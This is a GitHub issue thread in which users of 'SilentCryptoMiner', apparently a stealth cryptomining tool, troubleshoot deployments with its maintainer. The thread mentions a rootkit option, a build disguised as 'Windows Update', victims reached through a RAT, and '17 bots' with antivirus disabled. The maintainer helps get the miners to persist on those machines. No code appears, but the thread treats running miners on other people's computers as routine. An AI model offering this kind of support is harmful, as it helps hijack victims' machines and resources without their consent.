### ISSUE TITLE
,

### ISSUE THREAD

**Issue by DogusCyk** [UnamSanctam/SilentCryptoMiner#651]
It doesn't work the first time I open the miner, but it works the second time

**Comment by UnamSanctam** [comment]
Are you sure you waited for it to install (if you have that enabled)?

**Comment by DogusCyk** [comment]
yes, I turned on that setting, but the first time I open it, the miner closes directly.

**Comment by DogusCyk** [comment]
It works properly when I open it for the 2nd time

**Comment by DogusCyk** [comment]
but i don't think it will be a problem i just wanted to point it out

**Comment by UnamSanctam** [comment]
Can you enable "DEBUG" and try it?

**Comment by DogusCyk** [comment]
sure

**Comment by DogusCyk** [comment]
I opened the debug and created it again, but the miner still did not work and the debug did not work either.

**Comment by DogusCyk** [comment]
but the miner checker also shows as working but the process is not visible in the hacker

**Comment by DogusCyk** [comment]
rip translate

**Comment by UnamSanctam** [comment]
If the miner is showing in the checker then it's running.

**Comment by DogusCyk** [comment]
no its not runing just cmd running

**Comment by DogusCyk** [comment]
ah I can't send the video I took because it can be 10 MB at most

**Comment by UnamSanctam** [comment]
You can upload it to anonfiles.

**Comment by DogusCyk** [comment]
anonfiles is out of use in turkey

**Comment by DogusCyk** [comment]
I will send from another site

**Comment by DogusCyk** [comment]
ah how stupid i am sorry i opened rootkit instead of debug

**Comment by DogusCyk** [comment]
but again the same debug still didn't work but this time dialer.exe appeared in task managerbut again the same debug still didn't work but this time dialer.exe appeared in task manager

**Comment by DogusCyk** [comment]
![image](https://user-images.githubusercontent.com/81167210/164546966-d13c755f-d395-4586-a3f2-686b31bb5eeb.png)

**Comment by UnamSanctam** [comment]
Yes debug will only show errors if they appear, if there are no errors then no messages will appear either.

**Comment by DogusCyk** [comment]
Also, someone I don't know has opened my miner (it showed up in my rate) but it didn't come to my webpanel, I don't know, maybe it was deleted or it didn't work

**Comment by DogusCyk** [comment]
> Yes debug will only show errors if they appear, if there are no errors then no messages will appear either.

but shouldn't the miner also work with the debug?

**Comment by DogusCyk** [comment]
I hope you understand what I'm saying, translate doesn't translate well

**Comment by DogusCyk** [comment]
if you want i can send you my miner

**Comment by DogusCyk** [comment]
or settings

**Comment by DogusCyk** [comment]
it doesn't matter

**Comment by DogusCyk** [comment]
[Windows Update.zip](https://github.com/UnamSanctam/SilentCryptoMiner/files/8534916/Windows.Update.zip)

**Comment by DogusCyk** [comment]
[Windows Update-uninstaller.zip](https://github.com/UnamSanctam/SilentCryptoMiner/files/8534918/Windows.Update-uninstaller.zip)

**Comment by DogusCyk** [comment]
[mysettings.zip](https://github.com/UnamSanctam/SilentCryptoMiner/files/8534928/mysettings.zip)

**Comment by DogusCyk** [comment]
Uninstaller doesn't work anymore, it's weird

**Comment by DogusCyk** [comment]
a strange problem, I hope it is caused by me, I will not go out now

**Comment by DogusCyk** [comment]
In short, the problem is that the miner does not inject when I first open it.

**Comment by UnamSanctam** [comment]
Hmm, it works normally for me when I run yours. Can you try uninstalling yours, then install it, wait for a minute or two and then run the checker?

**Comment by DogusCyk** [comment]
I just did this but the problem is still the same

**Comment by UnamSanctam** [comment]
Do that and then show a screenshot of the checker.

**Comment by DogusCyk** [comment]
sure

**Comment by DogusCyk** [comment]
nothing happen

**Comment by DogusCyk** [comment]
ill send video wait

**Comment by UnamSanctam** [comment]
Can you show a screenshot of the checker?

**Comment by DogusCyk** [comment]
There are also 2 people in the rat, but neither of them appear on the panel.

**Comment by DogusCyk** [comment]
https://dosya.co/phjtl9t290v0/Desktop_2022.04.21_-_23.56.33.04.zip.html

**Comment by DogusCyk** [comment]
please watch this it will help me to explain this problem better

**Comment by UnamSanctam** [comment]
Oh, I missed it but you enabled "Don't run miner after install" so it won't run after the installation.

**Comment by DogusCyk** [comment]
what, actually, it's not a problem, is it just a feature of the setting?

**Comment by UnamSanctam** [comment]
Yes that's a feature https://github.com/UnamSanctam/SilentCryptoMiner/wiki#dont-overwrite-old-miners, it's in "Advanced Options" since it can be hard to understand.

**Comment by DogusCyk** [comment]
so does this feature enable the miner to run on startup?

**Comment by DogusCyk** [comment]
ah yes it does, all this time I thought it was a problem hahaha

**Comment by DogusCyk** [comment]
Sorry for wasting your time, I hadn't considered that.

**Comment by UnamSanctam** [comment]
No it's alright.

**Comment by DogusCyk** [comment]
ah yes indeed it works when i restart my computer

**Comment by DogusCyk** [comment]
I think this feature is great, thank you for everything

**Comment by UnamSanctam** [comment]
Good luck with the mining.

**Comment by tarekxxx** [comment]
> Yes that's a feature https://github.com/UnamSanctam/SilentCryptoMiner/wiki#dont-run-miner-after-install, it's in "Advanced Options" since it can be hard to understand.

where this option bro ? can i get screen shot ? because my miner not working in startup ?

**Comment by UnamSanctam** [comment]
> > Yes that's a feature https://github.com/UnamSanctam/SilentCryptoMiner/wiki#dont-run-miner-after-install, it's in "Advanced Options" since it can be hard to understand.
> 
> where this option bro ? can i get screen shot ? because my miner not working in startup ?

It's in the newest version, if they're not starting with the computer then it's usually either some incorrect setting or an antivirus removing it that's causing it.

**Comment by svox07** [comment]
unam hi yesterday i uploaded 17 bots with a video card they all have antivirus disabled i control it with rat but after a reboot they don't restart

**Comment by UnamSanctam** [comment]
> unam hi yesterday i uploaded 17 bots with a video card they all have antivirus disabled i control it with rat but after a reboot they don't restart

Try it with the example settings from the wiki.
